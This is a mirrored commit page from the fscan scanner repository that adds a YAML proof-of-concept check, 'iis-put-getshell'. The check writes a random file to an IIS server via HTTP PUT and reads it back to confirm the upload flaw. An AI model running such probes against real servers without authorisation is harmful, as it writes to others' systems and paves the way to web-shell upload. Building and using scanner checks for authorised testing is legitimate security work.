mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-25 20:51:52 +08:00
优化ip解析模块
This commit is contained in:
@@ -0,0 +1,22 @@
|
||||
name: poc-yaml-iis-put-getshell
|
||||
set:
|
||||
filename: randomLowercase(6)
|
||||
fileContent: randomLowercase(6)
|
||||
|
||||
rules:
|
||||
- method: PUT
|
||||
path: /{{filename}}.txt
|
||||
body: |
|
||||
{{fileContent}}
|
||||
expression: |
|
||||
response.status == 201
|
||||
- method: GET
|
||||
path: /{{filename}}.txt
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes(fileContent))
|
||||
|
||||
detail:
|
||||
author: Cannae(github.com/thunderbarca)
|
||||
links:
|
||||
- https://www.cnblogs.com/-mo-/p/11295400.html
|
||||
Reference in New Issue
Block a user